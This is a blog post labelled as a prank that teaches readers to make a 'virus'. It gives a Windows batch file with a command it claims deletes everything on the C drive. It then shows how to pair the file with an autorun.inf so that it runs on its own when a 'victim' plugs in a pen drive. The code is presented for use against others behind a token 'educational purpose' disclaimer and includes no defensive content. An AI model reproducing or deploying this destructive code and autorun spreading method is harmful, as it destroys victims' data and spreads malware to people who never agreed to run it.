add-unit1

Showing posts with label prank. Show all posts
Showing posts with label prank. Show all posts

Monday, 5 December 2016

Virus for Fun

Hi Mates,
I am back again with a deadly virus that can cause your laptop/computer to install an OS again from scratch. This virus can be even more deadly if you are having your stuff in your "C" drive. 

So the first thing to understand is, never put your important things in "c" drive. :D

Ok, let's start with VIRUS now. :)


save your computer


   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y


   2. Save this file as 
virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will 
delete all the content of C Drive.


Creating and Spreading virus from a Pen-drive

Hi Guys,
You must be interested in creating a self executable virus.

Sound interesting? :)
Well, then you are at a right place. I am gonna show you how to spread virus from a pen drive.

Everybody is having a pen drive these days, so its easy to play around with this small virus trick.


---------So here we go---------



Step 1

Open your notepad and write:
[autorun]

open=anything.bat

Icon=anything.ico 
Now save this file as ‘autorun.inf’

Step 2

Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .


When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.

Now it depends on you what you want to put inside your batch file. :) 

[Note: This post is only for educational purpose, try this at your own risk]